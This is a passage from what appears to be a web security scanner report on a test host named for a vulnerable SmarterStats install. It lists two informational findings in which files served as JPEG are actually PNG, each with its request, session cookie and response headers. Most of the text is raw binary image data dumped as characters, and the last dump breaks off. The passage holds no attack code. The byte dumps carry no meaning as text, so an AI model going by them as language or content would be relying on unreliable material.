...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.8. http://vulnerable.smarterstats.6.0.host:9999/Temp/1d4802d431604203a5254435a7181b01.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1d4802d431604203a5254435a7181b01.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1d4802d431604203a5254435a7181b01.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 18895
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..IdIDATx^..    XTW...|.7.....u.d.3.&..M.........q...]ADQ.\..Q.DT"..*...".... "".....t:.6Kw.....UV.Uu.....z..I.U...;....g{..............P4...]:...@..@..@..@. l.. .. .. .. .p..6.7.... .. .. ...6............P8................................(...M...............}..@..@..@...N.....B.@..@..@..@...>.. .. .. ..
'.aSx..x .. .. .. .aC................)..P<..........................    @...@(...........@...@..@..@..@@.. l
o ...@..@..@.. l.. .. .. .. .p..6.7.... .. .. ...6............P8................................(...M...............}..@..@..@...N.....B.@..@..@..@...>....x.N=....../.K.{...(..k.c.8.p..{.;.i|..@..@@.. l.n_......2..q.5.Qw\..@..@.+. l^......-.2.....$
....MY..
......E..a%..L.........l..6Cf....U#E.A..@..l...........6!g!......4....\..]. v...$i|...;Z....@..@@-. lji).S9.j..f..U....g.Q.*3jU'e..Y4.:.\.....?.$.......    ....[......(    ........M....;I........E....g..brv.L..O...;.....m8v.IH........+    @.\I.....Z    .....f.$.3..{>..Z.O...|..#..Z.......8E....6|H.........9l..O.!Pks...GY...FD^.".&..... ...&.as7a\_{...6Fa.J....*.7+.D....sh..l&o.^..F .. .2..6.5.....&0*&......mq?......3..6t........{J]...%....../...y.>n.j!.,.ZZ
.....*...V[......PR..R.c:W.P
.v$:.....Qd.....D.K.....[    @..........aQ.7w.x............m.~zy.zi3`..dj..W.fs.Q.....w.........9~.t.9[r$..{s.......%...).5P..P0.^x.C..~.>.R..    ..bE.V.;n.$V,X,c...R..|.....$.qy../.....)     ....2g..............8D.........M..Y6...K.L}"............^t.....\.j#yF.k..B/.XO.....~\..@..@... l...{...    8.e.a...li...4........?.......uZyY..q.x.......BUy.F.A@.. l*h$....D.7..#(,w<......-.d..?.."....hY:9;.C.<....R..*..., .!..65&.... .......^.IcI......H..Z.4[2.s.....7.o..`...............QS.p    .....t(.y..3K...7Y..6..........)/...wQVF.%......h...M.M......p.m..3.p.@...,u.)..p.....Q..;AoO.J!.s n....2.h...M.M.
..k    pf-8.,.i.zj........J.kt..p..9{....rA.$n....._..Qp5.......i..QA.p...i...    .,.......T...K.P.yi.&D..6u#5..C./.U4.8V.._.....}.~.
...........H.. n....
.....M...:.@-....../Q.......n..n+....tj5c.5..GG,.x4......k;;..,;K...+c.......M...Z4!>
. ....64"....".[s4..A..O.4...,..s.>..5..D>B....&..v.....#....C.,.x.....5..6....j...P>....p...,;].d.........32J..C..    ...........7...@.<....H...... `".....yj.....tt.....v.Z..M...".Q......Q..Y......J...[.A..x........}..@@"....Ls.<.....E..@..iZ..'.......\..v.g..I[igV1z'....H. l.. .s... lG.......,,-...A[..h61AZyZ..n.
...C...X...............@../.KX*.^p.V.!.....<..00h:a-uZt......7...../.@...K..6..=j.s........b!pf..g.XHXLxH.Q3.....j.E.g>.....<..ZT...K.....G.uJ....D.Q.yG.W':#k.G....4.D...x.0.X.2n........t.....&.a.u...z#.C.-g...................1.}..F_p.?.5..o.nl.......=............j....}...\.6..I'. \...:._[.....xM......z...'.....M.]...@ %....Ju.....G.yjM..A...qa.3...f.a.46.C.].u............    ,O.'..i..W..W(m..s...e."`3u.qn.G.%9.6.?.......6t...0.).............k.. ...t..I.....Xv.xO=.@...I....vE.tN.W...H.;..qH.z..%....."......N.m....._r....g.......v..5.)....f..._tH....H..%...:...p;..\G.m.....b...>....    @..........q..QY.py...,....J[..|.8/....g...>......5...a+.S.%...#.>...NID(...Q.J..P.v.).....GU.A....vF-u@..w...r32<_...T!j. ...W......... m:x.QE]......QY....v.....;glZ.L&_q`;B..Z.n......6...9mX=..'........Z.u.$....P..........f...B...b."p....}.4...R.#.a._....".!]..8.].0(gh..>.BD......+Hy/>.@./..........Pr..8.w...../k|r.8..y.&.........}...^ ...$.aSg...:'.....q.8<<..,a.    .<q...#...........3.|.(........T...I....vC.uL..1n.....dY...<.....n+.dK[..bj...X.....P............A..9.+..Z..#."4.@dN{....6l../..P'...:...)..Y..b.!Y.{./..Y..P...p..m..~...."...5.:}.Pm.P'...:...!..G_.O..i...U..7.Q...!j:....S.%.^.0..wv........*..:    @...n(.......3../.P.....NH{.!...}..bY.#m<.........t.4.. .N..6u..J.3.<|..Xr...$.V...:e.)B.....]......iBuA@.. l.l7.ZG.2..S...Y..._$-2h=s7B......./.?.<'..F... .l..6e..J.s.<..8`.u.+............@.AO.Q...,...{.a.......'.aS|...z&..#.Z/.7..CaRv............w.._.......'.aS|...z%....n+..M.^..X......{..FC.P...z}.Po.P<........+..xp.........~kmf.C.A.>.S..{}.xt....b..^.pPo....)..P@=.pd..............#[}.\.E!.s..... .x..6.7.
.7._=..|.....>Y.2#.W]..k.0........K.......U.....Z...<..pp.....Zw.....'..@...>.C....tl..\.....4.E.
....MuM..k...:.....?...y% ........e..m0u.]..T.......#.aS]...Z& 7....9.....y....".lZ..A.4M.....E..D@nv.....B..KC..C}...c..l>..t.....!...4M.....E..D@nv..\k.v...N..>kV.\..1..<.d5=B(+.h...M.........Z.......[5 ...>.!.(.^_*K...:@.....1B9A@.. l.n^TN-...]$.y'....m<.....j...F...k..k.Ld."...... .i..6M7/*...|.......w..kb...CB.A.......e.?a...W..    ..y..6.71*.t.    G
.9..v3.RvM..E..+.._.9.}N:c4<....U.c.....    @.4.....    4.A~..v.xv^.%._C.....o.lo......`..... .=..6....A@.6..O..G.g\!....0pe.../.....
..O....6@    tL@.V.].dK...`..>.92.x....a....I...!.aSLS. z# w..|.u..@..[.@O.g.b.....P_....).EP......x..^v...:E.B..[......+..U9.......W/....S.....&..x...]!..]}@.............. .r..6.7 ..N._=.....D.....6......n...c....r&.Q.^:W.P...J.*'.aSy....$.%..|....G.k......0pk.Xv.n_da..8.T..@..<O...y..#......n....x....3B.N#...}.?..]i...2u...O0.....@......7.^.Zg.F..................6...&....... .Y..6....@@...s....].G].P...<......4. .8_.'..@... l..........@6.M......`..> g.h.EghB|..d.......y.8n.........6..m1d...>..4...v.+.....A....0......v.& w.Z......<..<...n..`...~....f...<L...a....    .=....K.s..`..>.M...s.h...h..k.~.Q{..0......v.&0gK.......j;k.{C.....0.J...PbwX.....i..........X.N @....KL..?...n......o........R...x.A..<H...A.....<r.......n+..`..>..'.-<...<b=..L.@..<C........P../......1...*..6..x...<W........%.a.,o.M..2..S......+.........}@...l.../3T.+. l^..........u...H..../..9..6........(.. ....6.`.M.H 01.Z,....`.-.3..`..>.._..c.JQ=~....$.a.&}.[W.:..G.V^..B.'}#...}.O..'lX).../TV.. l
h..A.....H.    ...I.3..!...}@..UX)...-.R9. l.i..D...z.=.&..^..?....+D..W....../c.....P5....).IP -..T..|........'...........+E..m.:)...M.-.ri......(h.,a.........l..;..%....g........).eP.M.8p.T.F..Z..(.......[.....vYS.**..J%.aSj..\.".Y..F.....W.!.@    }...2....$..E.\.......R    @...2(.....4.3............ox&.....g........).eP.M..,.g#.e.z%..aC......ak...M.........R    @...2(.....>|..=a.#..`..> cH.Md..Xu\S.**..J%.aSj..\.".Y..F@. c..1..c g.A..|.6...UT...J.....A.4E@......E!...}..... TF.. l.hDTA..d    ...T.#......%.d.qDm..9.<..V4.}..L.....%.....i..Q....+l}..!.g.{}.5..H...@.z..!......4s.<.....m.K......@...6.U...J...6m.#j.p.r.. j...`.b....a.=..4j..)..>..[.V..
%...J..5.^..:..7...K%.....[././T.A.|.m...V.^.......+.)F.@... l........U.{V.Zt....]....,...A.D....uo.....A.o..a>.......
y.G1o.J;..Jy..R..:t).u:..O.....J.OyG.I"....t.8.....eb...4}.t)BBB(22...]K.6m..{."l0..o.........u..6......9......./d..8.......ED).Mqj.O)....\...N|....K...Gi....m....$...-.H._mF..7.".:........I.r.....1Tzy..\K....$.cacqc.X.l....Rbb"......');;.!.dee......p.U......Px...#l}.P...Y...0..).../.g...B..1.c.......+.i..F4*..]...
{.2E^..t.B.....F.Mi'.x...J......tv................!..j.......C..IC..g...En..u.y.fI..(q.6.|S..J&.aSr..l.! G.xHt@.].........P.F?.........1.'4?.).]mK..........]..w.jq.[7Jk.........J.......D..K..UQ;zt.)..x....Kg._..q.;^3..+.CE..)##....%..L....)::..._O.v....4M..=a;r..-X.@3.;*... .as.U\.....s.;...Mw.2....6.LN...=..w.1.W...l.W.K....>.{...kGE}.Z..=z..V-(......5.?...    ......xz.5...........tj..L..W3.K..eE...z.4......]*...%K(..N.9...?~\3"gK..(l.S....'..H}....J.=b(.b....ft..]UN\... l.....@...../H........P..m.c..T..g5...........P..!m"BrZ....(qP+....^...[jKsy.G....7e]....}..t.1....V}U...Z.H.U.sC...uTt9Y.Ve..l..y.(88X.VMHH...$I.X~N.>...a`-    .$k...\..Rj....I.,%..?..".as.H\..l..,.OM.Sl.MU)l.6.%.."..:4....O......e...U..W;.b...4x...dD.*.._v\.....-.2oFy.&.....f'b..q.M.r. r.a..........H..,=..........K"....;w.....+p...W.r.T..*`...#.R..?..7.e.|L..l.......~#..\@......u...~V.g.\Oz..L~.EV.<Sh.%..sU..F.    a.h..Z."P..Kzg.v.......B....t\.C...
Q.&+...A....kg!m,p..7..I...6s.....syK.$..P.1..{..iA[zp...V}.0...0.zf_C.".UY...<D7.r.l.o-b.v$"".bbb$...g..;v.."go...[XX....Kq..a.^,zeeeR|....x.Yx,..T.|!e..T...A....M.9Cf.$J....a.9..[...q=..Yd.ed...!TFK....6.5.
.V.... K..l.K...tYq.:M..g{{R.....Z..i..Wi....bRrS...&]z_.i........$.U+S.-u..b.[K1...K...Vt.LC!roJ....^4.....E9S.aU.v...+.mGx2.q...!.V.l\ff&.={.#aO..n.J.7n4../.`a;p..I.8.h...(v.9~.Gaa.....r.~EH.'+....Y.*.....5f....V..5a.&Wf....3.....oC..J5.....N.......".g.v.+.)m..-=.n-G....."...COw.Y;.X|..5...sZX.Wc....!.....}.h..Z.$o.Y..I....~..e.......[IWz...J2........&e.Nn....U..........s.aU.r$44....o..C.g..qi....6^d..%.e.....?."."g\..r7w.\...e....#..d.l    ...R...J.....)lV....U..8..s..5..>..[... ..@....ct.ma.[Z..v.Q...O..g|..~..(..Sqq...MoP...5.......:tx....3H].yb..=b....^.5M..y{...jO.........}..B..{...|..v.Ns.a.K.....*=*.rF...|..U.V..U..=.t&..........:^.s....Jv..x.].......E......Z}..ZZ*%.MK...(....D.....o+G.1...65....F....^N.....,..QDA7..z..XT...lG7...2rE.............Y.......Ry.Xlq.-)....|.*..^..........V.o.v.x..o?.....%.W.......9.....{(.._..Z%j!bU..9#sr..@..b..s.\.uju-.[.... ....sY.FlG0.a.E..q....T.....=....@.....j,..GC..............yk..2......;......+.....Vm#.U...coK.9..e.aU.9..........9..#...x...S........#.2l<4..E.r.i...<.i.....C...We.....X.V...1..a3....9 lb.De.......)..>..{... `" w/6.....1R0h.P..>#..P?.....h....%.=mF...4*.!.On@.C..5...S)ou...A..gv.....Z|[...-mK)..Gyb.C.kbX..e...4...\_.V}.u9}..7.d^.i~../....<?m...t........S.6%x....&.aC......T..|.........F........@....\..e[z.......Sv............C....F.{....7sy.,..}...>......4......P...../........4...#,r..........@...>... ..?~.:c6R..e6..........M..@...Tq.}...u>.}.Kve.(tA....9...!.P..6O....Jy[......>;.M.....(.[...6.=g..zz..g.....mGx..o;........}...C@.JQ^x0v.}...OJ...o}..........C.J..t.e.......i.<1\..?..>..qV.y...%.|............n.\..y.v..Y..&E.q...@.s.0$.9....P....;...a.1bHt.n...mw.....v.......k..M......d...=...7h.G..d...E.......sy./.-.'}W>.%.mY....8.......h.......y.6n.....R.Y..
./<........;....6......(#._)*.;-/.';.\.MCW.Mq#....#..Fy[e.y........q...T].d..@..<G...9.....W.....<.>..w[...&$?.M.....&v..Ltl.G.x...6.5..z......F.7..    M.d.h.DN.~"...L.6........`.q..,a......^ ...#.a..k.    .$.....KL.Ma....M..@..b.y.8.}.<!jC<....G'.\............-ib.;tm...5f..".Jng..7..../..mB....o..........c}.Mv....r.....3._(..J..........g...#..|.....I.N|........~.....Y%...1~.....[.....U.?.kQ"}^..)...6.5...}.s...ox..,...Rt.........f.2zvp0U.a.d./.#.lu..5.....D..qS..>..!mJ...E.}.......>B......U.!B.....
......J...sAt6...7.9....\......Y...:.%P)l3...3..Ma.dc.%/....@i..G....&..9.....o...."...........?y..M...7....H.......g...............40..e...n}...#[,X.........F.E.....0i.7{.fk.....Tzy.]L..o.#el......Y8.|....NU.....,....Lac).).z...(....-.a.1..6.F..av.jR'...2...V.o..{.....,%.5....[0..z...Ka..0.*gU....,.#_.
~/.M....i....>...6.......}.j6Fl.C>....[......._.;Z.....1..X....,.G{G..[..."..>o...-..|...onW...y.X.......g..$....d.B..........39.f.......L...c...a[.P3q.......aD..Y.<5.W..J12.........1....tY...}....Q..{..6.E5...C.~`..*...6.7...M.r.c.E    <....i-..z5...RV......._'.....\...Z....4$.mZ3..*..\,9...iC.~.i..k..Q.Fy.[qK:..?.~(.f..%.$..6x8VzU.......Y...#l..*.s..H...t..AK....W._9lZ..6.iU4.......l.i....w4|>9I....=G.U)p....aQ..._=. .8O`KF...9b7.6|.=.....b....2d.-_8^...E.......Mh..!.....h..F.6....0A5qs.0*..M...Z.v+.v..8.+CdD.....].......g..z.I.y.d    ......I4.........%Li(.4.Z...Y,.l`Ua..Y+..#l.8.....fY..,^M....B@-...cY.G..W.,.p.C.as?c......;,....L.T3...)...........O....s_......)......R..qT:i...Hl    b.6.V.....W.v..$.Rh
.V......W+..j"c......<..D.Z...rX....p..r...'[.g.>5.......>....l{,.d$...a..`...Z..;,:1.>..<.D.X).t..A.'F+..g.?Zu....a.....4|N}.<~....D,..I...,.E.Z.............5..)Cc.....&
Y}k.9S..^5..2.J. ....s....f....S..6.U.6..J;.2m....._...6Xb....%\..@....aQ.Dw....=.'\.V.....QTqr....[:.,.R\.p.....4(...x0.N...(.<X...m....l.._V29.U.fCr..l..g.:Di9.f.    ....\6...f.c3.de.....I.LJ|>.Mj.........9XN.wlH..[rAu......-..Y.W.:K.f.JT..(
..j$ wX......[..OU..6.J.....s.N.Ul...U...Kk.G.,.^.@....Cc.S...........,aKl...^...GM.e.5...ZW..u.E=w-.25.a.\...@......#...`!lj........P..aT.....|mS......9.....G4h.[.a...N.................^.&`.i2[...b.VzT..55)........{.........8..f..TU.s....EIQ".vJ.
Ux.pb,e......Oko.vi....Qq.(rb+*..PD......[...s....3~.. .F..67...A........;i+../.........H5.,....C.:/@L........6.}..J..%.liC.............%kW.v.5..G..^w..A...H...F..4..!.`g.....+l......)D..........B......#.C........[".`..1.>].6......r.k....!..0.@...J...U..9......'n.^...J..-:;..............MV]...O    ...u%....2?...oQ...t{...F..q..k<\....n...Q....2.........&...M-.d........C.h..c..[.@.....1..=E..}.h:..SZW8.6....X~a.XA....4........Qn..l..;..w..C
. ....6.4......=..Sw..6..cB..
=.H.1qW..@....Q...._.G...K..&.5.
F...oS...tg.,.G.82K.B.~...Yn...x@A...@....F@.@.    ..:J.......b..........E...n...    T!dM....AtD.
.xk..c].....    -.......5..\....5>>......
. ....6.4....L ..>5    N.+l.e...>...L1....f.....D..5....@k.5.OJ.x$.nmG.f.........'".....P)...J....&.V...%......l..s.....,......3C...i*.........J.z,..........`.;w...3w.{..%l9.......]....j.R..6.6...M.....O@.]a.,..m.B..y=z.\...GR.. M.i!l    .z    a......H...I..&..!m.......5....w.j.~..6..!j.1.r......H..}.....p....b..l.&......_..,.....(...-::m(...W....([.8.......*T...O....6D4F..}...m>xXtQ.c.........R...ggj:N...>.7m......:..F5.-S.RyX.s!dO.6...i..............
.....z.)YC..v.....<.3R...tO.+B...|.ohC...,d-...xc*.\...O.Dw.....1c......6.8xP+......!.a.LS."Z"....<4...)E...#.v..5.....    .9!...N..S.P...F....^.).....M.|.|...
.w.-l..5...N..)Sh.......Zz.P..P5........2..Y..b.!YY6....F..x........SP.,.sst..6..mK^.m.gz-B...+H....P..p..`.sd(4Ml.{B,p0.X.X.X.......5..TA....fB!.J@.6..e.hk.[e.3x...Q.i....\...gfQ...K[n..a...X.9........R..6kQ...P[....h...#{.2......(.. .u..6.7.
...    .6.M...:...m.8.~...n..........Y.....2.c....wi....F..qb...tt.(*.....l...65kFw...vD>..||.$nW.m..#{/....BW............O..y...........Dq=.p1.../Q.....F..u.....?.4.m.EM....#b...0............ .qg.Wc..i4lyC.6}....4..An......o..RG...k...    ..aS.7[.'.br..a.K
..8..........n..S..|Y....xo.......).......N...u....A...    Y....|3.F.nB1..........{..-kW.t.....E.....2J.>\
.w.......?....D._2..lc.,3lWB..C./m~F|V...z.3|.y.....e..C.]...pq....i.eQ/M.x....8p7.'..%m.7.....>..Z..!~........"W.]C..G>.#....wB...?iG!.-.x. ...C..-[..M..~V8...6..9*}.o*W..%...?..K7y.l,[s.*.F+..$_.>.\..'...'.;..t..!..&.3]...e..o.....6t..P    .GV...!,.C.+2.8.KO..Z.=H......."..\.x....@...)&..nCc.....~...d.v.G..+^<.......|7..d...<7....m]..hq..^......Q.,....3.............B...r...R8....@.......    .[y../9'+......r.me.c....).t.5.*.. ,.|}d<...s..Zt..4../M<.Pd^...;.....:Pb....+^A.+IW7h@K_y...s.@....a.C.B.,$..TYd..B<.1.....$...\. l...Ub. lJl..    ........3m;../.-m....*!l.D..|...y..+..../.x.?%.....-.H.5cL....C_....j.6.....s..s.\..[Y.i.U6..rH.r.........Y...I".&.V..q........Bz#.a.[....'p..!..J.....$...OHN..|...[E_d.'...a...=.RJ.K..|..".x.....-.l..`a....i5i.*d...aU=.....R.$U..f{H.....[...J^.s.."T.]3.......<.dPU.QX%...).5P...I`..bj.zXv...G.=a...p.{.!......m..g..6....a.+.^....m...4(..E}..$m......!.j|I.fZ.i&kv3ZU2t.+9..w.Q....5..k.    ._...j.KN..2{....k.qc.......P....I..1<.'2m5.......o.!Dm)B...;......}....u%.l..Q.f.7.ak......,!k..<..@...I....vC.A@"06..:..qH....O..?.5g../2..t..+B/-C.d.c^.8...h...J...#...cY.f>.md.;4q..8Z
.. .b..6.7............u^~.!i...>........+2n.....0q........K...K_...K..1.C..5..6f]kz...x`@..TL.....C.A.    .....R.KL.C.6b.=I..W..~...B.
.q.?.-.Y......)..R.DJy$-+.....<..k..............M...........N..qE.I[..+.@.(.&7...
...J.4.......Q....pZt.+d.:.....M..........R.Y.d...r.d.jz..3QN..\j..I...[ .
.Z.A..,wY...JaW.A.....& .4......A.P..I.........>...0....6RTd|L..W!.dP...6.iL..G.$6....+-..5^.::.....T^.E.@...&.as..>...$`....-.:<.h.&JY..$kFi...8...DWW#.d e........Up.n.......
..)..D.@... l...k.............-f...9#..Ze...w!:7W.[,.A.."_.M....OW9.........5.=O(..(...M    ..2.....W.v..7e.Z/...A..e.(m.O."..C.W..2.|}2......=.q(x.5..H.D.3k.u.G.>..u.s.K..R.@....(.....K.....>m........d.(n.{R...TQ..!.A~.+.Yd..<X-+v.    s:.......F.i..;..... .$..6%.....n ....Y..Z._F_lm.....-c.aN....;...}L...HG?....?...%......MJkDc..._...=.....P.....Z.e..7......R.p*.z.~Ln....t...iTq-.a.....I.N..*l...iAA.Z.......]...~..^.....(...MI......    |....,..}...9i...........a...SGPj.o.......N.E^.^+Q...#?iD...tso..A...D.....@Y@.....{....H_ml........(o.U.n@.. {.....i..0....e...J.x.4.|S...........[...(...MI.......|..gteY.*..W;i3.[n......o.E;..J..?.....M8.C.W...3ki.N1../...]......QY.xN..|K..M.........Z.*.zS......'.....#.)c.O(.T.Z    .g..%.P......~%5....)..'.. ..:".a.Qc.. P..i.t...(.~..M:1a..Q.$...EI...uDgg...n.X...m.x.ia3f.....h:^h..4...\F.....    ...N.....[.....T..>.,.c..$.....Ab..<.qK.
!o.....N."..........?....8$m3/T..Um........X%.G..tB.....F5A@...EG)7..t?..k.mFyc.91B....v}#U........I.R6...V.....U+'[.&.mH.V4..Y......=..:]N..= ..*'.aSy... .j..m+.=.r..HO..mWH.    K..W....'.a..-...'...../C...,7..'.|....6.uh#\.6.7.@...M.....E.@.i....SALKi.......7c&.`.....CT.Gts...p..e    eN$J.U...D.......,[...4|}C....
.|BG_<...Fy../.......i.mQ3.p    .i.t...d.+.YM*+#wt ..qDgfPE~...&.Q...'........D...).j-hU...M>tx..Y..........lJ.n....x../B..........    @...<(..(...b..ss~C...7c..<..2..=UH...e.........^..|&*.P?.K.=...._.h..J......>.z..C....o......6    @............$I....L.9.'*.}.....<..3i..}9....uk....q>.HC..H.U..K2...........R...^..}..../...;[n|..\D..."..............4..q..........2.]In...5..1....;..o.;fu{..-8T...G...}_......=i.gf...Bfn...U...!l....{......q3......V......%.^.....Y.$%d.~LnE...#........z....x>.[^5J.K..L.e..g.X...9.....4e.....]\..M9......k..f..lV..!.a.a.^N.`...u..ni.\To. lzkq....D..'-?.H..........]-t.y{.P_..w6...d......xm=..8\...a.7..`...,....`.....V.l.n..Y6..+o,....2j&A.Y:.HCy.....fC.....-......M...*...    p..x......T..'M...y.........D<........l.l.b..V..Y..E&.l(.B.,.N.......,....).W.1.re6$Zc&.2sh%K..or[..s....+(.. ..V    <)H..7.*t..n{..5.......J.41..C.J.4.F....P....7.O....k.C.f.Um^..pi..Vf..aRS......eZx...Y.eUa.\Pa....]..;PU.........@.c.X.x...u.2R".v...^m....*x..s!.6lm"..,i<.........,Y.6sj..g...5.;WU..d....V....6.L8[~]..T... l...K...8N..Y.J.L.V.fM...2......x.x...u.."..66..g..^...R)ma".U.>t.~q...j..V3l.E....Is.j.of..E6..&sQr..6.C..._K}.u......... ....~......LI.n..!5.V..S..$OF....O..BW58.f.x.O\..p..x.uyh....(.[R....b.,J....^be...\..W.r-..,.0......=.|.wT.0_Uj....k..".+O-..9.J...W.,...+..P.....i.AQ..........J.d..;......jp6.............a....6..I....9..i..z
.*.......9..o....$...#wa=O....*....wf3\..W.7.....G0.& ...........|.......M...i.9Q.....^.Y.m..*......... lN@.G@..<C.8..3w.]@..@@.. l.m....tO.d.8i.(^ .. .w..6.......L. ....+.@..@@.. lz...?.(.@....o..(..(.....x....3.q....'....+l^..7|..@@{. l.kS...4A..i.&*.J....@-    @.j    .....p..l.....*...:    @...n(5.h..6..|... ......9..o......l..9.......    @...F(!.x...DZ..D7.....@a....>t}..i..... ...%.aSo... .~....R..g......[.......M5M......xQ..i........P,...b..........a.\..?... ....6.4.
..
$ g...DzjV.+1m....j.......*.K.H ...!.a..w....A...6u.B)A..@.3. l......:    @...n(5.....@.4...........0q)....p....yv.$.h...9lb_..<W.(.Dq].............<..^..L[.6.................E q......0.Y..f.Y.9{....#.....(...M.......    dR..~d.d..Uf...Xy......R.2s......{...5._..Q{.......).qP4..;...4I..2X.w...z......(...M.M.........a^...,.M.d....wFtV..Yy?......B    @...0(.....F..V9,....j.1....q..^.......@...J.....A.@....x......i.bu...ynr... .. .P..6.6.... PI@...Q.1.VC....mV... .. .P..6.6.... `23i.....9....a~.qH..yn...*S+..t....P(...B..............#...............(...M...............}..@..@..@...N.....B.@..@..@..@...>.. .. .. ..
'.aSx..x .. .. .. .aC................)..P<..............l.R.......IEND.B`.

10.9. http://vulnerable.smarterstats.6.0.host:9999/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7501
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d....IDATx^....s.]..w..?.UTQ.b.aL.S.@...3..;$.B...0...`.0s.d.F.a.....(/......1.....7.`{8Gj...m..:.....}.]u.............[...B....@.....-p'..qq. .... .....F. .... ......l.'..C....@....l.... .... .\...|..<..@....@..F. .... ......l.'..C....@....l.... .... .\...|..<..@....@`R..|9O..l3......}.<?z;m.... ....D..N`;_..|.6q.<-....l..."m.[.}.......f.kA....@........&......j...n.+.@....@..h..    l....V^...E[.....j.~.....&..A....@.......^.\..ehS....Yz.....O?.tz.........=@......=pqq1h..N`..9..t..v./.....G..e.<..{..g....=.>....    l.v......y;x{.Y!..@.....yK.=..}..[.....{...c...b`+.j;o.....{......6_.....O.{fz...=.>.....@    lcI.}..8..    x.L......'@`..    l..T....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR...$>.....'.c/...........N....&5..M...y.J|R1...\..LX}.....B.    lR.9.......uH.'...=.l..c? f....@..... +..=...m..W`....o.6J............g_.....{.}..6....~!..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.......D.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..].....[.A`.Z..b.-.t.....{...M.w.....O.h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6....~6..E..6...*f..N..>...    ..${[`........JM..hy...?.......V.4..6c.L..?..r~u.|..5.C....W`....m...u.t.....K.}..c...b`;_..l..yl....*.......g.GZ./.s.....
